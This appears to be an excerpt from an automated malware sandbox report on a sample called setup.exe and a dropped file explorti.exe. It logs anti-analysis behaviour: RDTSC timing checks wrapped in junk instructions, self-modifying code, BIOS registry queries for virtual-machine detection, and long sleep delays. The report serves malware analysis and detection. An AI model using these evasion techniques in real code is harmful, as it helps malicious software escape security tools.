                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0137 second address: 50D013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D013B second address: 50D0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b mov bh, 9Eh 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f pushfd 0x00000010 jmp 00007FC169461AA8h 0x00000015 adc cl, 00000018h 0x00000018 jmp 00007FC169461A9Bh 0x0000001d popfd 0x0000001e pop esi 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC169461AA2h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D025E second address: 50D0264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0D04 second address: 50F0D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 18h 0x00000005 mov cx, 6ADFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FC169461AA2h 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007FC169461AA7h 0x0000001c and esi, 00E9778Eh 0x00000022 jmp 00007FC169461AA9h 0x00000027 popfd 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0D5F second address: 50F0D7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC16945A280h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0D7D second address: 50F0D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0843 second address: 50F0859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A282h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0859 second address: 50F0892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FC169461AA7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC169461AA5h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0892 second address: 50F0898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0898 second address: 50F089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F089C second address: 50F08A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0712 second address: 50F07D7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC169461AA9h 0x00000008 and al, 00000006h 0x0000000b jmp 00007FC169461AA1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FC169461A9Eh 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC169461AA1h 0x00000022 sub cx, 4216h 0x00000027 jmp 00007FC169461AA1h 0x0000002c popfd 0x0000002d movzx ecx, bx 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FC169461AA9h 0x00000039 adc ah, 00000026h 0x0000003c jmp 00007FC169461AA1h 0x00000041 popfd 0x00000042 mov cx, A357h 0x00000046 popad 0x00000047 mov ebp, esp 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FC169461AA9h 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F07D7 second address: 50F07DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F07DD second address: 50F07E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F04E3 second address: 50F0553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC16945A282h 0x00000009 sbb eax, 24EDE2A8h 0x0000000f jmp 00007FC16945A27Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a pushad 0x0000001b call 00007FC16945A285h 0x00000020 pop ecx 0x00000021 mov di, 39B4h 0x00000025 popad 0x00000026 jmp 00007FC16945A27Dh 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 call 00007FC16945A283h 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100415 second address: 510041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 510041B second address: 510041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 510041F second address: 510048D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FC169461AA6h 0x00000011 push eax 0x00000012 jmp 00007FC169461A9Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FC169461AA6h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC169461AA7h 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 510048D second address: 5100493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100493 second address: 5100497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130AA2 second address: 5130AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110596 second address: 51105BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51105BA second address: 51105BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51105BE second address: 51105C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51105C4 second address: 51105C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51105C9 second address: 51105ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 76A4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461AA6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51105ED second address: 511061F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f jmp 00007FC16945A280h 0x00000014 popad 0x00000015 mov eax, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 movzx ecx, di 0x0000001c push eax 0x0000001d push edx 0x0000001e movsx ebx, si 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 511061F second address: 511062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 and dword ptr [eax], 00000000h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 511062D second address: 5110645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A284h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110645 second address: 511064B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 511064B second address: 511064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 511064F second address: 5110661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110661 second address: 5110673 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110673 second address: 5110679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110679 second address: 511067D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F062F second address: 50F0640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 538E5431h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0640 second address: 50F0655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC16945A27Fh 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0655 second address: 50F0665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, BF11h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0665 second address: 50F06DF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC16945A286h 0x00000008 xor eax, 52771D98h 0x0000000e jmp 00007FC16945A27Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007FC16945A288h 0x0000001b mov bx, si 0x0000001e pop esi 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 push ebx 0x00000023 call 00007FC16945A286h 0x00000028 pop ecx 0x00000029 pop ebx 0x0000002a movzx ecx, di 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov bx, D79Ch 0x00000035 movsx edx, cx 0x00000038 popad 0x00000039 pop ebp 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F06DF second address: 50F06E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100C6 second address: 51100CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100CC second address: 51100D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100D0 second address: 51100D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100D4 second address: 51100FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC169461A9Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC169461A9Ah 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100FA second address: 51100FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100FE second address: 5110104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110104 second address: 511010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100726 second address: 510072C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 510072C second address: 5100732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100732 second address: 5100753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FC169461AA0h 0x00000011 pop eax 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100753 second address: 51007A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC16945A27Eh 0x00000011 sbb cl, 00000008h 0x00000014 jmp 00007FC16945A27Bh 0x00000019 popfd 0x0000001a mov bx, cx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 mov ecx, 57ABC077h 0x00000026 popad 0x00000027 push FFFFFFFEh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC16945A280h 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51007A6 second address: 51007B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51007B5 second address: 5100816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 54531947h 0x0000000e jmp 00007FC16945A287h 0x00000013 add dword ptr [esp], 22A6A6D1h 0x0000001a jmp 00007FC16945A286h 0x0000001f push 3F4E352Bh 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100816 second address: 510081A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 510081A second address: 5100820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100820 second address: 5100881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC169461A9Bh 0x00000009 and ch, FFFFFFCEh 0x0000000c jmp 00007FC169461AA9h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor dword ptr [esp], 49BE9B2Bh 0x0000001e jmp 00007FC169461A9Ch 0x00000023 mov eax, dword ptr fs:[00000000h] 0x00000029 pushad 0x0000002a mov ax, 781Dh 0x0000002e mov dx, si 0x00000031 popad 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC169461A9Bh 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100881 second address: 51008E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC16945A27Ah 0x00000013 jmp 00007FC16945A285h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FC16945A280h 0x0000001f or ecx, 3997A768h 0x00000025 jmp 00007FC16945A27Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51008E7 second address: 5100914 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC169461A9Dh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100A1A second address: 5100AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FC16945A27Dh 0x0000000b sub ax, 7B36h 0x00000010 jmp 00007FC16945A281h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 jmp 00007FC16945A27Eh 0x0000001d mov eax, dword ptr [76FBB370h] 0x00000022 jmp 00007FC16945A280h 0x00000027 xor dword ptr [ebp-08h], eax 0x0000002a pushad 0x0000002b jmp 00007FC16945A27Eh 0x00000030 pushfd 0x00000031 jmp 00007FC16945A282h 0x00000036 xor cx, E3E8h 0x0000003b jmp 00007FC16945A27Bh 0x00000040 popfd 0x00000041 popad 0x00000042 xor eax, ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AA8 second address: 5100AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AAC second address: 5100AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AB0 second address: 5100AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AB6 second address: 5100AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A286h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AD0 second address: 5100AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AD4 second address: 5100B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FC16945A27Ch 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FC16945A280h 0x00000016 lea eax, dword ptr [ebp-10h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FC16945A27Ch 0x00000022 or esi, 3A11AB08h 0x00000028 jmp 00007FC16945A27Bh 0x0000002d popfd 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100B21 second address: 5100B6C instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov di, E638h 0x0000000b popad 0x0000000c mov dword ptr fs:[00000000h], eax 0x00000012 jmp 00007FC169461AA7h 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a jmp 00007FC169461AA6h 0x0000001f mov eax, dword ptr [esi+10h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100B6C second address: 5100B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100B70 second address: 5100B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100B76 second address: 5100B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100B7B second address: 5100BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 8937h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FC169461A9Ah 0x00000012 jne 00007FC1DB220C28h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007FC169461A9Dh 0x00000020 pop ecx 0x00000021 pushfd 0x00000022 jmp 00007FC169461AA1h 0x00000027 add ecx, 70F49246h 0x0000002d jmp 00007FC169461AA1h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100BD4 second address: 5100C11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f popad 0x00000010 mov dword ptr [ebp-20h], eax 0x00000013 jmp 00007FC16945A282h 0x00000018 mov ebx, dword ptr [esi] 0x0000001a pushad 0x0000001b push esi 0x0000001c movsx ebx, ax 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 mov bl, 14h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100C11 second address: 5100C2E instructions: 0x00000000 rdtsc 0x00000002 mov si, 378Dh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461A9Fh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100C2E second address: 5100C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov bh, 3Dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test ebx, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC16945A282h 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 666B2D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 11F6B2D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_05150DB0 rdtsc 0_2_05150DB0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 450
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4296 Thread sleep time: -54027s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4820 Thread sleep count: 56 > 30
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4820 Thread sleep time: -112056s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052 Thread sleep count: 450 > 30
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052 Thread sleep time: -13500000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5480 Thread sleep time: -540000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3696 Thread sleep count: 47 > 30
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3696 Thread sleep time: -94047s >= -30000s
